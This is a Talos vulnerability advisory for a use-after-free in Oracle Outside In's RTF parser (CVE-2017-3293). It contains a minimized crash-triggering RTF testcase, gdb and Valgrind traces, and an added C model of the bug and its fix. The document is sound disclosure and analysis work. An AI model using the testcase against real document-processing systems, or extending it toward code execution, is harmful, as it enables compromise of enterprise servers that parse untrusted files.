Talos Vulnerability Report

TALOS-2016-0215

Oracle Outside In Technology RTF Parsing Code Execution Vulnerability

January 17, 2017

Report ID

CVE-2017-3293

Summary

An exploitable Use After Free vulnerability exists in the RTF parser functionality of Oracle Outside In Technology SDK. A specially crafted RTF document can cause a reference to previously freed memory to be reused; with suitable heap manipulation this can be turned into arbitrary code execution.

Tested Versions

Oracle Outside In Technology 8.5.3.

Product URLs

http://www.oracle.com/us/technologies/embedded/025613.htm

CVSSv3 Score

8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Details

Oracle Outside In Technology SDK is a widely used file format access and filtering framework. It’s used in many enterprise software distributions for accessing, parsing, filtering and converting numerous file formats.

While parsing a specially crafted RTF document, a reference to a freed object is reused. If, in the window between the object being freed and its reference being reused, the same memory area is reallocated with attacker-controlled contents, the reuse becomes an arbitrary read or write of memory that could ultimately result in arbitrary code execution.

The minimized testcase that triggers this vulnerability is as follows:

{\rtf1
\ansi
{
\info
\par
}
{
\footer
\posx
{ \par }
}
{
\footer
}
}

In the above testcase, the \par directive causes allocation of memory for an object which is subsequently freed when its enclosing group closes. When document rendering reaches the second \footer directive, the parser reuses the pointer to that same memory area without a new allocation, and so accesses freed memory. With proper heap manipulation, the attacker can cause the same area of memory to be allocated for a different object between the free and the reuse; the contents of that object are then under attacker control at the point of reuse.
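The lifetime problem the testcase exercises, as an added model written for this report and not taken from Oracle's code: a paragraph object is created by \par inside a \footer destination, freed when the group that created it closes, and the destination's pointer to it is then reused by the next \footer control word. The structure name ParaState, the fields footer_para and marker, and the function run_model are invented for the illustration; the only detail carried over from the crash is that the real reuse reads a field at offset 0x40 of the stale object. The model never dereferences the freed object; it records the stale reuse with a shadow liveness flag, and reports (rather than assumes) whether a same-sized allocation issued at that moment reclaims the freed chunk, since that depends on the allocator. The hardened variant applies the usual fix, clearing the reference when the object is freed, so a later \footer finds no object to reuse.

```c
/*
 * Toy model of the RTF use-after-free described above. Added example, not
 * Oracle's code; ParaState, footer_para, marker and run_model are invented.
 */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Field at +0x40 mirrors the "cmp DWORD PTR [eax+0x40],-1" seen in the crash. */
typedef struct {
    char pad[0x40];
    int  marker;
} ParaState;

typedef struct {
    ParaState *footer_para;   /* reference that may outlive its object */
    int        para_live;     /* shadow flag: is footer_para's object allocated? */
    int        alloc_depth;   /* group depth at which footer_para was allocated */
    int        in_footer;
    int        footer_depth;
    int        depth;
    int        hardened;      /* 1: clear the reference when the object is freed */
    int        stale_uses;    /* reuses of an already freed object */
    int        reclaimed;     /* a same-size allocation landed on the freed chunk */
} Parser;

static void handle_par(Parser *p)
{
    if (!p->in_footer || p->footer_para)
        return;
    p->footer_para = calloc(1, sizeof(ParaState));
    if (!p->footer_para) { perror("calloc"); exit(1); }
    p->footer_para->marker = -1;
    p->para_live   = 1;
    p->alloc_depth = p->depth;
}

static void handle_footer(Parser *p)
{
    if (p->footer_para && !p->para_live) {
        /* Buggy path: object gone, pointer reused. The real parser reads
           footer_para->marker here; this model only records the reuse and
           checks whether an attacker-sized allocation reclaims the chunk. */
        void *attacker = malloc(sizeof(ParaState));
        if (attacker == (void *)p->footer_para)
            p->reclaimed = 1;
        p->stale_uses++;
        free(attacker);
    }
    p->in_footer    = 1;
    p->footer_depth = p->depth;
}

static void close_group(Parser *p)
{
    if (p->footer_para && p->para_live && p->depth == p->alloc_depth) {
        free(p->footer_para);
        p->para_live   = 0;
        p->alloc_depth = -1;
        if (p->hardened)
            p->footer_para = NULL;   /* fix: no dangling reference survives */
    }
    if (p->in_footer && p->depth == p->footer_depth)
        p->in_footer = 0;
    p->depth--;
}

/* Minimal RTF walker: only groups and control words matter for this model.
   Returns the number of stale reuses; *reclaimed reports chunk reclamation. */
int run_model(const char *rtf, int hardened, int *reclaimed)
{
    Parser p;
    memset(&p, 0, sizeof p);
    p.hardened    = hardened;
    p.alloc_depth = -1;

    for (const char *s = rtf; *s; s++) {
        if (*s == '{') {
            p.depth++;
        } else if (*s == '}') {
            close_group(&p);
        } else if (*s == '\\') {
            char word[32];
            size_t n = 0;
            while (isalpha((unsigned char)s[1]) && n < sizeof word - 1)
                word[n++] = *++s;
            word[n] = '\0';
            if (s[1] == '-' && isdigit((unsigned char)s[2]))
                s++;                      /* negative numeric parameter */
            while (isdigit((unsigned char)s[1]))
                s++;                      /* numeric parameter, e.g. \rtf1 */
            if (strcmp(word, "par") == 0)
                handle_par(&p);
            else if (strcmp(word, "footer") == 0)
                handle_footer(&p);
        }
    }
    if (p.footer_para && p.para_live)
        free(p.footer_para);              /* paragraph never closed by a group */
    if (reclaimed)
        *reclaimed = p.reclaimed;
    return p.stale_uses;
}

/* The advisory's minimized testcase, embedded as the sample input. */
static const char TESTCASE[] =
    "{\\rtf1\n\\ansi\n{\n\\info\n\\par\n}\n"
    "{\n\\footer\n\\posx\n{ \\par }\n}\n"
    "{\n\\footer\n}\n}\n";

int main(void)
{
    int rec = 0;
    int buggy = run_model(TESTCASE, 0, &rec);
    int fixed = run_model(TESTCASE, 1, NULL);
    printf("buggy model: %d stale reuse(s), freed chunk reclaimed by same-size alloc: %s\n",
           buggy, rec ? "yes" : "no");
    printf("hardened model: %d stale reuse(s)\n", fixed);
    return 0;
}
```

The buggy model reports exactly one stale reuse, at the second \footer, and the hardened model none. The reclaim flag is informational: with glibc's tcache a 68-byte chunk is normally handed straight back, whereas the real object is a 5,440-byte block, where the grooming described later in this report is needed to land a chosen object on it.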

The memory allocation and object initialization are done in the function at 0xb6031310 in the libde_wp.so shared library (with image base 0xb6022000):

[----------------------------------registers-----------------------------------]
EAX: 0xad496ac0 (0xad496ac0)
EBX: 0xb6073934 --> 0x517f0
ECX: 0xb5f52bac --> 0x10000
EDX: 0x4
ESI: 0xb5f52bac --> 0x10000
EDI: 0xad4c7f38 --> 0x1
EBP: 0xad499f58 --> 0x1
ESP: 0xbfffb1f0 --> 0x0
EIP: 0xb60352b6 (mov    DWORD PTR [esp+0x28],eax)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
			0xb60352aa:        xor    edx,edx
			0xb60352ac:        mov    eax,0x4
			0xb60352b1:        call   0xb6031310
=> 0xb60352b6:        mov    DWORD PTR [esp+0x28],eax
			0xb60352ba:        mov    edx,DWORD PTR [esp+0x28]
			0xb60352be:        test   edx,edx
			0xb60352c0:        jne    0xb6034e40
			0xb60352c6:        jmp    0xb6034caa
[------------------------------------stack-------------------------------------]
0000| 0xbfffb1f0 --> 0x0
0004| 0xbfffb1f4 --> 0x0
0008| 0xbfffb1f8 --> 0xb603edae (<OIWCloseFatal>:        push   ebx)
0012| 0xbfffb1fc --> 0xb601b4f0 --> 0xb70d9edc --> 0xc002
0016| 0xbfffb200 --> 0xb5f53d8c --> 0x0
0020| 0xbfffb204 --> 0x0
0024| 0xbfffb208 --> 0x0
0028| 0xbfffb20c --> 0xb5f52bac --> 0x10000
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value


Breakpoint 16, 0xb60352b6 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
gdb-peda$ bt
#0  0xb60352b6 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#1  0xb603bb0f in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#2  0xb603ccd3 in PWPreviewGetPage () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#3  0xb603fb58 in OIW_PLMCallback () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#4  0xb6057bf8 in PLPageRetrieve () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#5  0xb605b3cd in PLMH_MapDrawToRect () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#6  0xb603df4d in DEProc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#7  0xb6f46192 in GAPSetOutputInfoImgExNP () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#8  0xb6f52869 in GAPMetafileToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#9  0xb6fb10c8 in GAGraphicToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#10 0xb6fcdfec in EUDoConversionIX () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#11 0xb6fc9522 in VwImageExportWriteFunc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#12 0xb6fc2852 in VwExportWriteFuncEx () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#13 0xb6fe2bb5 in VwExportWrite () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libex_img.so
#14 0xb7d63e61 in FARunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_fa.so
#15 0xb7fa4602 in EXRunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_ex.so
#16 0x08048b7b in main ()
gdb-peda$

In the above output, we can see that the allocated buffer is at 0xad496ac0. The buffer is later freed at 0xb602de67 in the same library by a call to SYSNativeFree, which is a wrapper around free():

gdb-peda$ awatch *0xad496ac0
Hardware access (read/write) watchpoint 17: *0xad496ac0
gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0x4
EBX: 0xb6073934 --> 0x517f0
ECX: 0x7
EDX: 0x0
ESI: 0xad496ac0 (0xad496ac0)
EDI: 0xad496ac0 (0xad496ac0)
EBP: 0x1
ESP: 0xbfffa930 --> 0xb5f53e04 --> 0x0
EIP: 0xb602de5c (mov    DWORD PTR [esp],esi)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
			0xb602de52:        je     0xb602de5a
			0xb602de54:        mov    DWORD PTR [esi+0xc80],edx
			0xb602de5a:        mov    esi,DWORD PTR [edi]
=> 0xb602de5c:        mov    DWORD PTR [esp],esi
			0xb602de5f:        call   0xb6027384 <SYSNativeUnlock@plt>
			0xb602de64:        mov    DWORD PTR [esp],esi
			0xb602de67:        call   0xb6027424 <SYSNativeFree@plt>
			0xb602de6c:        add    esp,0x10
[------------------------------------stack-------------------------------------]
0000| 0xbfffa930 --> 0xb5f53e04 --> 0x0
0004| 0xbfffa934 --> 0x1
0008| 0xbfffa938 --> 0x10001
0012| 0xbfffa93c --> 0xb6073934 --> 0x517f0
0016| 0xbfffa940 --> 0xb6073934 --> 0x517f0
0020| 0xbfffa944 --> 0xb601b9b0 --> 0xb601ba00 --> 0xb601b4f0 --> 0xb70d9edc --> 0xc002
0024| 0xbfffa948 --> 0xb5f38ac0 (0xb5f38ac0)
0028| 0xbfffa94c --> 0xb602e243 (mov    ecx,edi)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Hardware access (read/write) watchpoint 17: *0xad496ac0


Value = 0xad496ac0
0xb602de5c in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
gdb-peda$ bt
#0  0xb602de5c in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#1  0xb602e243 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#2  0xb603336f in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#3  0xb6035dc0 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#4  0xb6036abe in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#5  0xb603b31e in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#6  0xb603ccd3 in PWPreviewGetPage () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#7  0xb603fb58 in OIW_PLMCallback () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#8  0xb6057bf8 in PLPageRetrieve () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#9  0xb605b3cd in PLMH_MapDrawToRect () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#10 0xb603df4d in DEProc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#11 0xb6f46192 in GAPSetOutputInfoImgExNP () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#12 0xb6f52869 in GAPMetafileToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#13 0xb6fb10c8 in GAGraphicToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#14 0xb6fcdfec in EUDoConversionIX () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#15 0xb6fc9522 in VwImageExportWriteFunc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#16 0xb6fc2852 in VwExportWriteFuncEx () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#17 0xb6fe2bb5 in VwExportWrite () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libex_img.so
#18 0xb7d63e61 in FARunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_fa.so
#19 0xb7fa4602 in EXRunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_ex.so
#20 0x08048b7b in main ()
gdb-peda$

The first Use After Free condition occurs at 0xb6036062 (offset 0x14062 into libde_wp.so, which is the same location Valgrind later reports as 0x5912062 under its own load address). During normal execution the process does not crash, because the freed memory still holds the same, still valid looking data. If a debugging allocator such as libduma is used, the freed page is kept reserved but marked unreadable precisely to catch this kind of issue. In that case, resuming execution results in the following crash:

gdb-peda$ c
Continuing.


Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xad496ac0 (0xad496ac0)
EBX: 0xb6073934 --> 0x517f0
ECX: 0x4c ('L')
EDX: 0xbfffb22c --> 0xb6073934 --> 0x517f0
ESI: 0xad385ac0 (0xad385ac0)
EDI: 0x0
EBP: 0xad34dac0 (0xad34dac0)
ESP: 0xbfffafd0 --> 0xbfffb058 --> 0x0
EIP: 0xb6036062 (cmp    DWORD PTR [eax+0x40],0xffffffff)
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
			0xb603604e:        je     0xb60362ec
			0xb6036054:        cmp    WORD PTR [esi+0x9dc],0x0
			0xb603605c:        js     0xb60362ec
=> 0xb6036062:        cmp    DWORD PTR [eax+0x40],0xffffffff
			0xb6036066:        je     0xb60362ec
			0xb603606c:        lea    edx,[esi+0x30]
			0xb603606f:        mov    DWORD PTR [esp+0x4c],edx
			0xb6036073:        add    eax,0x40
[------------------------------------stack-------------------------------------]
0000| 0xbfffafd0 --> 0xbfffb058 --> 0x0
0004| 0xbfffafd4 --> 0x0
0008| 0xbfffafd8 --> 0x1d4
0012| 0xbfffafdc --> 0xb7c685b4 ("LOGetString")
0016| 0xbfffafe0 --> 0x1
0020| 0xbfffafe4 --> 0xb6020fa8 --> 0xb6076d51 --> 0xb6022000 --> 0x464c457f
0024| 0xbfffafe8 --> 0x16
0028| 0xbfffafec --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xb6036062 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
gdb-peda$ vmmap $eax
Start      End        Perm        Name
0xad46b000 0xad499000 ---p        mapped
gdb-peda$ bt
#0  0xb6036062 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#1  0xb6036abe in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#2  0xb603b31e in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#3  0xb603ccd3 in PWPreviewGetPage () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#4  0xb603fb58 in OIW_PLMCallback () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#5  0xb6057bf8 in PLPageRetrieve () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#6  0xb605b3cd in PLMH_MapDrawToRect () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#7  0xb603df4d in DEProc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#8  0xb6f46192 in GAPSetOutputInfoImgExNP () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#9  0xb6f52869 in GAPMetafileToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#10 0xb6fb10c8 in GAGraphicToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#11 0xb6fcdfec in EUDoConversionIX () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#12 0xb6fc9522 in VwImageExportWriteFunc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#13 0xb6fc2852 in VwExportWriteFuncEx () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#14 0xb6fe2bb5 in VwExportWrite () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libex_img.so
#15 0xb7d63e61 in FARunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_fa.so
#16 0xb7fa4602 in EXRunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_ex.so
#17 0x08048b7b in main ()
gdb-peda$

In the above output, note that the pointer dereferenced by the cmp instruction (eax = 0xad496ac0) is the same one that was previously freed, and that the process crashed only because the debugging allocator's page permissions deny read access.

By further manipulating the document so that an object of precisely the right size is allocated between the point of free and the point of reuse, the attacker controls the contents read at that point (including the value at offset 0x40 that is compared against -1), and further memory corruption can be achieved, potentially resulting in arbitrary code execution.

The vulnerability can be triggered by running the ixsample binary, included in the SDK, with the above testcase. Although the supplied testcase does not crash on its own under the system allocator, the use after free can be caught with Valgrind, for example.

Crash Information

Example output from Valgrind. Note that the first three invalid reads are 64 bytes (0x40) into the freed 5,440-byte block, which matches the [eax+0x40] dereference shown above, and that all of them trace back to the same SYSNativeFree call:

$ valgrind  $IX ./5f06aa03c157a4f7522d42320f523e93.rtf asd
==17551== Memcheck, a memory error detector
==17551== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==17551== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info
==17551== Command: /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/ixsample ./5f06aa03c157a4f7522d42320f523e93.rtf asd
==17551==
Creating file: "asd"
==17551== Invalid read of size 4
==17551==    at 0x5912062: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5912ABD: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x591731D: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5918CD2: PWPreviewGetPage (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x591BB57: OIW_PLMCallback (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5933BF7: PLPageRetrieve (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x59373CC: PLMH_MapDrawToRect (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5919F4C: DEProc (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5170191: GAPSetOutputInfoImgExNP (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551==    by 0x517C868: GAPMetafileToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551==    by 0x508B0C7: GAGraphicToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551==    by 0x50A7FEB: EUDoConversionIX (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551==  Address 0x5d37fd0 is 64 bytes inside a block of size 5,440 free'd
==17551==    at 0x402C2CD: free (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==17551==    by 0x4809C16: SYSNativeFree (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libwv_core.so)
==17551==
==17551== Invalid read of size 4
==17551==    at 0x5905DB7: WPUCompSccvwPos (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==  Address 0x5d37fd0 is 64 bytes inside a block of size 5,440 free'd
==17551==    at 0x402C2CD: free (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==17551==    by 0x4809C16: SYSNativeFree (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libwv_core.so)
==17551==
==17551== Invalid read of size 4
==17551==    at 0x5912062: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5912A63: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x591731D: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5918CD2: PWPreviewGetPage (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x591BB57: OIW_PLMCallback (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5933BF7: PLPageRetrieve (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x59373CC: PLMH_MapDrawToRect (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5919F4C: DEProc (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5170191: GAPSetOutputInfoImgExNP (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551==    by 0x517C868: GAPMetafileToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551==    by 0x508B0C7: GAGraphicToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551==    by 0x50A7FEB: EUDoConversionIX (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551==  Address 0x5d37fd0 is 64 bytes inside a block of size 5,440 free'd
==17551==    at 0x402C2CD: free (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==17551==    by 0x4809C16: SYSNativeFree (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libwv_core.so)
==17551==
==17551== Invalid read of size 1
==17551==    at 0x59174BE: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5918CD2: PWPreviewGetPage (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x591BB57: OIW_PLMCallback (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5933BF7: PLPageRetrieve (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x59373CC: PLMH_MapDrawToRect (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5919F4C: DEProc (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551==    by 0x5170191: GAPSetOutputInfoImgExNP (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551==    by 0x517C868: GAPMetafileToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551==    by 0x508B0C7: GAGraphicToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551==    by 0x50A7FEB: EUDoConversionIX (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551==    by 0x50A3521: VwImageExportWriteFunc (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551==    by 0x509C851: VwExportWriteFuncEx (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551==  Address 0x5d394b0 is 5,408 bytes inside a block of size 5,440 free'd
==17551==    at 0x402C2CD: free (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==17551==    by 0x4809C16: SYSNativeFree (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libwv_core.so)
==17551==
Export successful: 1 output file(s) created.
==17551==
==17551== HEAP SUMMARY:
==17551==     in use at exit: 28 bytes in 2 blocks
==17551==   total heap usage: 19,458 allocs, 19,456 frees, 25,394,878 bytes allocated
==17551==
==17551== LEAK SUMMARY:
==17551==    definitely lost: 0 bytes in 0 blocks
==17551==    indirectly lost: 0 bytes in 0 blocks
==17551==      possibly lost: 0 bytes in 0 blocks
==17551==    still reachable: 28 bytes in 2 blocks
==17551==         suppressed: 0 bytes in 0 blocks
==17551== Rerun with --leak-check=full to see details of leaked memory
==17551==
==17551== For counts of detected and suppressed errors, rerun with: -v
==17551== ERROR SUMMARY: 12 errors from 4 contexts (suppressed: 0 from 0)

Credit

Discovered by Aleksandar Nikolic of Cisco Talos.

Timeline

2016-10-10 - Vendor Disclosure
2017-01-17 - Public Release